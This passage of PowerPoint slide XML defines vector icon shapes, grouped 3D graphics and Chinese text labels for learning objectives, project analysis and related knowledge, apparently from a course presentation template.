              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
